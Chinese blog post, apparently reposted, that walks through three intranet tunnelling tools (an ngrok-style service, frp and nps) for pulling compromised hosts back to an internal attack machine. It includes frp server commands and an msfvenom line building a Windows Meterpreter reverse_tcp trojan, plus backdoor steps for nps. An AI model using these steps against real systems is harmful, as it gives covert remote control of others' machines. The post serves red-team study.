内网穿透工具及技术总结

news2024/11/23 8:23:17

攻击主机在内网,控制其他网段内网的主机,理论上是不可行的(攻击机和目标机都在内网 连接就是从内网到内网)

绕过内网协议实现上线(穿透),按照我的理解就是穿透技术解决的问题就是解决内网到内网、外网到内网的通信问题

接下来我们以Nrgwork、Frp、Nps三款常见的内网穿透工具为例子来进行说明

Nrgwork

这是一款商业的内网穿透工具,但是也有免费的产品供给我们使用

原理

寻找一个外网的跳板机,先通过一个手段时内网的主机和跳板机先进行连接,连接好之后就相当于建立了一个通道。然后使用外部的目标主机去连接我们与内网建立好的通道的内网主机,这样我们就做到了目标主机通过隧道主动连接到了我们的内网主机,一方面解决了外网主机到内网主机的一个连接,另外一方面也做到了出网减少防火墙阻挡的情况

操作步骤如下

选择产品,并配置我们的ip端口信息

下载客户端到内网主机上面

执行语句建立隧道

建立好隧道后,我们可以在本地内网的攻击主机下载好客户端后输入网站配置好的id就可以建立好连接

使用./sunny clientid 网站分配的ID号

这就表名我们内网的主机已经和和Nrgok已经建立了连接

我们使用msf生成一个http反向连接的后门程序

生成一个连接跳板主机的木马,跳板机的地方收到了来自于目标主机的上线流量之后就可以将上线的流量转发到我们的内网攻击主机上面,从而实现上线

Frp

frp是一个专注于内网穿透的高性能反向代理工具,支持udp tcp https http等多种协议可以将内网访问以安全便捷的方式通过具有ip节点的中转暴露到公网中

配置服务端

进行配置 服务器修改配置文件frps.ini

bind_port=7000

启动服务端

./frps -c ./frps.ini

客户端修改配置

通过上面两步的操作就顺利建立了客户端和服务器端的连接隧道

在远程主机访问本地的6000端口的流量就会转发到主机的6688端口

生成木马

msfvenom -p windows/meterpreter/reverse_tcp LHOST=xxx.xxxx.xxxx.xxx LPORT=6000 -f exe > frp.exe

最后执行木马实现上线

Nps

nps是一款轻量级高性能功能强大的内网穿透代理服务器。目前支持tcp、udp流量转发,

可支持任何tcp和udp的上层协议(访问内网网站 本地接口调试 ssh访问 远程桌面 内网dns解析等等)

此外还有http代理服务 内网sockets5服务 p2p等等

配置文件

如果有端口占用请修改配置文件,一般情况下直接使用默认配置即可

启动服务

nps.exe install

nps.exe start

访问8080端口

环境搭建成功

新建一个客户端,直接设置一个项目名称就行

在服务端建立连接记录这个秘钥

在客户端执行连接命令

内网主机和nps服务器通过秘钥和客户端进行连接

生成NPS服务端的通信端口的后门(工具收到流量后会将流量转发到我们的内网控制主机)

监听本地的5555端口,在目标主机上执行后门就可以上线

最终外网主机通过NPS隧道反向上线了我们的内网主机

总结

这三款工具Nrgwork是一款商业产品,免费版本的带宽和稳定性包括我们的数据流量的安全性都得不到保障,但是较为直观可以了解内网穿透的原理,不推荐使用。第二款是较为有名的工具(hw面试中也可能会被问到),但是配置是文件的形式,不太直观,但是通信方面较好。第三款工具,有图形化的界面操作,步骤较为直观,支持协议较多,推荐使用

写在最后

在做内网穿透实验的时候会遇到很多问题,例如工具版本是否匹配,不同的操作系统会使用不同的版本的工具识别。其次设置好防火墙的规则很重要。最后也是我踩到的最大的坑就是在使用云服务器例如阿里云 腾讯云等等主机的时候要关注平台的防火墙策略,因为忽略了这个,我查错了了一天,愿各位可以避免这个问题,少走弯路。

如有错误,请及时指出,谢谢。

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/1601104.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

Visual Studio2010源码编译curl_7_60

一、源码解压目录内容 很开心里面可以找到CMakeLists.txt文件,说明可以实用CMake工具进行构建,由于多数开源项目都选择实用CMake作为构建编译工具,大家蝇该都比较熟练了。 二、实用CMake开始构建Visual Studio 2010工程 很顺利整个构建过程没…

06节-51单片机-LCD1602调试工具

欢迎订阅专栏,持续为您更新! 1.LCD1602调试工具 使用LCD1602液晶屏作为调试窗口,提供类似printf函数的功能,可实时观察单片机内部数据的变换情况,便于调试和演示。 本文提供的LCD1602代码属于模块化的代码&#xff…

中国人工智能产业年会智能交通与自动驾驶专题全景扫描

中国人工智能产业年会(CAIIAC)是中国人工智能技术发展和应用的重要展示平台,不仅关注创新,还涵盖了市场和监管方面的内容,对于促进人工智能领域的发展起到了重要作用。年会汇集了来自学术界、工业界和政府的专家&#…

Github 2024-04-17 开源项目日报 Top10

根据Github Trendings的统计,今日(2024-04-17统计)共有10个项目上榜。根据开发语言中项目的数量,汇总情况如下: 开发语言项目数量Python项目2非开发语言项目2Vue项目1HTML项目1Rust项目1C项目1C++项目1Mojo项目1Jupyter Notebook项目1TypeScript项目1编程面试大学:成为软件…

QT系列教程(4) Qt 信号和槽

信号和槽 当我们需要一个界面通知另一个界面时,可以采用信号和槽机制。通过链接信号和槽,当一个界面发送信号时,链接该信号的槽会被响应,从而达到消息传递的目的。 所以我们先创建一个Qapplication Widgets 应用。Creator会为我们…

Pytorch入门实战 P06-调用vgg16模型,进行人脸预测

目录 1、本文内容: 1、内容: 2、简单介绍下VGG16: 3、相关其他模型也可以调用: 2、代码展示: 3、训练结果: 1、不同优化器: ①【使用SGD优化器】 ②【使用Adam优化器】 ③Adam 动态学…

Python数据可视化:无向网络图

【小白从小学Python、C、Java】 【计算机等考500强证书考研】 【Python-数据分析】 Python数据可视化: 无向网络图 [太阳]选择题 关于以下代码输出结果的说法中正确的是? import networkx as nx import matplotlib.pyplot as plt a [(A, B), (B, C), (B, D)] …

zabbix 自动发现与自动注册 部署 zabbix 代理服务器

zabbix 自动发现(对于 agent2 是被动模式) zabbix server 主动的去发现所有的客户端,然后将客户端的信息登记在服务端上。 缺点是如果定义的网段中的主机数量多,zabbix server 登记耗时较久,且压力会较大。1.确保客户端…

淘宝API商品详情数据在数据分析行业中具有不可忽视的重要性

淘宝商品详情数据在数据分析行业中具有不可忽视的重要性。这些数据为商家、市场分析师以及数据科学家提供了丰富的信息,有助于他们更深入地理解市场动态、消费者行为以及商品竞争态势。以下是淘宝商品详情数据在数据分析行业中的重要性体现: 请求示例&a…

Customizable Ghosts Pack

“可定制的幽灵包”为游戏开发商快速将幽灵角色融入游戏提供了坚实的基础。鬼角色的标准解决方案。 Customizable Ghost Pack: “可自定义的幽灵包”为游戏开发商快速将幽灵怪物集成到游戏中提供了坚实的基础。鬼角色的标准解决方案。 关键功能 ⭐怪物创造者工具。 ⭐完全…

浅谈Spring的Bean生命周期

在Spring框架中,Bean(即Java对象)的生命周期涵盖了从创建到销毁的全过程,主要包含以下几个阶段: 实例化(Instantiation): 当Spring IoC容器需要创建一个Bean时,首先会通过…

HCIA--综合实验(超详细)

要求: 1. 使用172.16.0.0/16划分网络 2.使用ospf协议合理规划区域保证更新安全 3.加快收敛速度 4. r1为DR没有BDR 5.PC2,3,4,5自动获取IP地址;PC1为外网,PC要求可用互相访问 6.r7为运营商,只能配…

[沫忘录]MySQL索引

[沫忘录]MySQL索引 索引概述 优点 提高数据检索效率,降低数据库IO成本通过索引对数据进行排序,降低数据排序成本,降低CPU消耗 缺点 索引会占用一定空间当更新数据时,也需更新索引数据,这会降低数据的更新效率 索引…

Adobe AE(After Effects)2023下载地址及安装教程

Adobe After Effects是一款专业级别的视觉效果和动态图形处理软件,由Adobe Systems开发。它被广泛用于电影、电视节目、广告和其他多媒体项目的制作。 After Effects提供了强大的合成和特效功能,可以让用户创建出令人惊艳的动态图形和视觉效果。用户可以…

LabVIEW变速箱自动测试系统

LabVIEW变速箱自动测试系统 在农业生产中,采棉机作为重要的农用机械,其高效稳定的运行对提高采棉效率具有重要意义。然而,传统的采棉机变速箱测试方法存在测试效率低、成本高、对设备可能产生损害等问题。为了解决这些问题,开发了…

[docker] 镜像部分补充

[docker] 镜像部分补充 这里补充一下比较少用的&#xff0c;关于镜像的内容 检查镜像 ❯ docker images REPOSITORY TAG IMAGE ID CREATED SIZE <none> <none> ca61c1748170 2 hours ago 1.11GB node latest 5212d…

数据中心IP代理VS住宅代理IP,区别详解

一、什么是数据中心/机房IP代理&#xff1f; 数据中心/机房IP代理是使用数据中心拥有并进行分配和管理的IP的代理&#xff0c;俗称机房IP代理。 二、数据中心/机房IP代理的特点 与住宅代理通过使用ISP拥有和分配的IP地址的设备路由请求的情况不同&#xff0c;数据中心代理利…

Python 基于 OpenCV 视觉图像处理实战 之 OpenCV 简单人脸检测/识别实战案例 之一 简单人脸识别

Python 基于 OpenCV 视觉图像处理实战 之 OpenCV 简单人脸检测/识别实战案例 之一 简单人脸识别 目录 Python 基于 OpenCV 视觉图像处理实战 之 OpenCV 简单人脸检测/识别实战案例 之一 简单人脸识别 一、简单介绍 二、简单人脸识别实现原理 三、简单人脸识别案例实现简单步…

陇剑杯 流量分析 webshell CTF writeup

陇剑杯 流量分析 链接&#xff1a;https://pan.baidu.com/s/1KSSXOVNPC5hu_Mf60uKM2A?pwdhaek 提取码&#xff1a;haek目录结构 LearnCTF ├───LogAnalize │ ├───linux简单日志分析 │ │ linux-log_2.zip │ │ │ ├───misc日志分析 │ │ …

【蓝桥杯嵌入式】串口通信与RTC时钟

【蓝桥杯嵌入式】串口通信与RTC时钟 串口通信cubemx配置串口通信程序设计 RTC时钟cubemx配置程序设计 串口通信 cubemx配置 打开串口通信&#xff0c;并配置波特率为9600 打开串口中断 重定义串口接收与发送引脚&#xff0c;默认是PC4&#xff0c;PC5&#xff0c;需要改为P…